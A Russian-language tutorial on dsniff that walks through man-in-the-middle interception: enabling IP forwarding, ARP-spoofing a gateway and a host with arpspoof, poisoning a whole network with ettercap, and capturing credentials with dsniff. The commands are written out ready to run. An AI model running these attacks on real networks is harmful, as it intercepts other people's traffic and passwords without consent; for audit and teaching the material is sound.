Примеры команды dsniff на Linux
Dsniff – один из наиболее полных и мощных свободно распространяемых наборов инструментов для перехвата и обработки информации для аутентификации.
Его функциональность и многочисленные утилиты сделали его распространенным инструментом, используемым злоумышленниками для перехвата паролей и информации для аутентификации из сетей.
Сетевой коммутатор не передает пакеты всем в сети так же, как сетевой концентратор, и поэтому теоретически человек в сети не может просматривать чужой трафик.
Однако есть способы преодолеть эту проблему, которые заключаются в выполнении подмены arp.
Dsniff
В этой статье мы просто обсудим, как это делается, без обсуждения теории, стоящей за этим процессом.
Для начала необходимо установить необходимую программу, в данном случае это пакет dsniff, который содержит программу arpspoof, которая нам нужна.
В Ubuntu или любом другом дистрибутиве на базе Debian он устанавливается с помощью команды apt-get, как показано ниже;
Установка (Ubuntu)
sudo apt-get install dsniff
Включении переадресации IP-адресов
Чтобы убедиться, что трафик перенаправляется в реальный пункт назначения, когда он достигает нашей машины, необходимо выполнить следующую команду;
sudo echo 1 > /proc/sys/net/ipv4/ip_forward
Выполним спуфинг ARP
Следующая команда скажет шлюзу “Я – 192.168.0.100”, а следующая команда скажет 192.168.0.100 “Я – шлюз”.
sudo arpspoof 192.168.0.100 -t 192.168.0.1 sudo arpspoof 192.168.0.1 -t 192.168.0.100
Таким образом, весь трафик, который должен идти на шлюз с машины и наоборот, будет сначала проходить через нашу машину, а только потом направляться к реальной цели.
С помощью этой манипуляции мы можем помониторить что происходит в сети запустив любой из инструментов для анализа пакетов, tcpdump или wireshark.
Ettercap
Однако существуют программы, позволяющие упростить весь процесс.
Одной из самых популярных программ для этого является ettercap.
Ettercap может выполнять спуфинг arp, а также многое другое.
В Ubuntu пакет называется ettercap-gtk;
Установка (Ubuntu)
$ sudo apt-get install ettercap-gtk
Запуск спуфинга ARP (графический интерфейс пользователя)
Запуск программы с ключом -G запустит ее в GTK, а не в ncurses.
sudo ettercap -G
В меню выберите следующее;
Sniff -> Unfied sniffing
И в подсказке выберите сетевой интерфейс, который будет использоваться.
Обычно это eth0
Network Interface: eth0
В новом меню выберите следующее, чтобы добавить в список все хосты в сети
Hosts -> Scan for hosts
Следующие действия выполнят подмену arp для всех в сети.
Mitm -> Arp poisoning -> Ok Start -> Start sniffing
Выполним спуфинг ARP
Следующая команда выполнит то же самое, что и в примере выше, за одну команду;
sudo ettercap -q -T -M arp // //
Примеры команд dsniff
1. Для мониторинга сети на наличие небезопасных протоколов:
# dsniff -m [-i interface] [-s snap-length] [filter-expression]
2. Чтобы сохранить результаты в базе данных, а не выводить их:
# dsniff -w gotcha.db [other options...]
3. Чтение и вывод результатов из базы данных:
# dsniff -r gotcha.db
¯_(ツ)_/¯ Примечание: Информация для исследования, обучения или проведения аудита. Применение в корыстных целях карается законодательством РФ.